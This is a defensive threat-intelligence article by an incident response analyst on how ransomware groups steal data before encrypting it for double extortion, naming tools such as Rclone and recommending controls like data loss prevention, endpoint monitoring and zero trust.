We’ve got your data: threat actor tactics for a successful data heist

Tom Priest
June 2021
A closer look at data theft by ransomware groups

In this article we look into the well-established tactic of double extortion, some of the methods used by threat actors, and how to prevent it.

This article was originally published as a guest article for DAC Beachcroft's Data And Cyber Bulletin May 2021.

The strategies and tools used by cyber threat actors have grown increasingly sophisticated, with one of the most significant recent developments being the theft of data from organisations. Over the past year, ransomware threat groups have widely adopted the tactic of exfiltrating data prior to encrypting files, intensifying the pressure on victims to pay a ransom.

The consequences of data breaches can be devastating to organisations. As well as the underlying cost of dealing with ransomware attacks (including business interruption, system restoration, incident response and legal advice) organisations may also have to meet data breach related costs such as fines, class action costs and notification costs. The reputational damage of a data breach can be long-lasting, affecting potential future investment opportunities, share price and, most damaging of all, customer trust.

In this article, we explore the diverse arsenal of tools and techniques that ransomware groups use to steal data, making it one of the most damaging risks facing businesses worldwide. To mitigate this increasing threat, organisations need to ensure that a range of controls are in place, from a robust data loss prevention strategy to user awareness training.

A shift in behaviour

As many organisations have established more effective data backup and recovery strategies, it is becoming more common to restore systems from backups rather than pay exorbitant ransoms for decryption keys. As a result, many ransomware threat groups now exfiltrate data before encrypting files. They then threaten to publish the data publicly, which increases pressure on the victim organisation to pay the ransom and recover their files. Threat groups such as DoppelPaymer and Sodinokibi host dedicated data leaks sites on the dark web where sample files are published for proof of compromise. DarkSide, the ransomware group believed to be responsible for the recent Colonial Pipeline cyberattack in the US, hosted more than 2 terabytes of stolen data on their leaks site, DarkSide Leaks, before it was taken offline on 13 May. By the end of 2020, data exfiltration occurred in more than 70% of all ransomware attacks according to analysis by Coveware.

From compromise to data breach: how data is exfiltrated

Once threat actors gain access to a network, they will often search for specific document types such as Word documents, PDFs and Excel spreadsheets with filenames that contain terms such as ‘password’, ‘credentials’ and ‘financial’. These files can provide the information that threat actors need to elevate privileges and gain wider access to the network, and also provide high-value targets for data exfiltration. When critical systems, such as file servers, have been identified, threat actors often operate a ‘low and slow’ approach to harvest as much sensitive data as possible whilst avoiding detection by endpoint and perimeter security measures.

In attempts to remain undetected, threat actors will utilise tools or features that already exist on the victim’s systems, a practice referred to as ‘living off the land’. Commonly-used software tools such as WinRar and 7zip allow threat actors to compress large volumes of data prior to exfiltration. File-sharing protocols used in most organisations for the legitimate transfer of files, including SMB and FTP, can then be exploited to facilitate the exfiltration of data out of victim networks.

As the security landscape has shifted and new ransomware threat groups have established themselves, novel methods of exfiltrating data have been introduced. The rapid adoption of cloud applications and remote access software due to the COVID-19 pandemic left gaps in the security posture of many businesses, as speed of deployment was prioritised over security. Ransomware groups such as Conti have exploited the lack of security monitoring of cloud storage applications through the use of tools such as the command-line program, Rclone. This tool facilitates the exfiltration of files to more than fifty cloud storage providers, including Google Drive, Amazon S3 and Microsoft OneDrive, allowing threat actors to steal data whilst evading detection.

In organisations where perimeter and cloud security is closely monitored, exfiltrating data via a remote attack may be impractical, and physical access to the network is required. Threat actors and malicious insiders can use USB drives and removable media such as external hard drives and mobile phones to facilitate data exfiltration. In March 2021, a Russian man pleaded guilty for attempting to bribe a Tesla employee with $1 million. According to court documents filed with the U.S. Department of Justice, the man conspired to “transmit malware provided by the co-conspirators into the company’s computer system, exfiltrate data from the company’s network, and threaten to disclose the data online unless the company paid the co-conspirators’ ransom demand”.

Reducing the risk of data exfiltration

Although software vulnerabilities and weak perimeter security controls are frequent infection vectors, phishing emails are the most common method of compromise used by ransomware groups to gain entry into victim networks. Sophisticated social engineering techniques trick users into giving away credentials or clicking malicious links within emails. Controls that reduce the risk of phishing and social engineering are therefore an effective way to address data exfiltration risk. Organisations can also mitigate the threat of data exfiltration by implementing regular email security awareness training to thwart attacks before they begin.

An effective data loss prevention (DLP) strategy, together with endpoint DLP agents, can help companies to monitor sensitive data by generating alerts when signs of exfiltration are observed. Organisations should consider blocking or actively managing access to cloud storage solutions that are not approved for use. Security monitoring and logging tools should be utilised to flag unusual behaviour within the network perimeter, including endpoint detection and response (EDR) platforms to continuously monitor for suspicious activity.

Implementing a zero-trust architecture allows organisations to minimise the attack surface of the network whilst limiting opportunities for lateral movement. Proactive security measures that set traps for cyber threat actors can be used to alert organisations to a potential breach, using tools such as Canarytokens. Where appropriate, administrative tools such as RDP and WinRM and vulnerable versions of file-sharing protocols such as SMBv1 should be disabled to reduce the risk of compromise. Finally, good practice such as vulnerability patching, antivirus software and multi-factor authentication should be employed to provide a more robust defence against intrusion and the subsequent threat of data exfiltration.

Tom Priest
LinkedInenvelope by Bluetip Design from the Noun Project
Tom is a cyber security analyst at Asceris specialising in incident response, network forensics, business email compromise investigations and ransomware investigations.

About Asceris

Our mission at Asceris is to reduce the financial and business impact of cyber incidents and other adverse events. By understanding the cost drivers of claims and addressing these proactively through automation and continuous process refinement, we are able to deliver high quality incident response services in close collaboration with our industry partners.

Follow us on LinkedIn or subscribe to our RSS feed to make sure you don’t miss our next article.

Other recent insights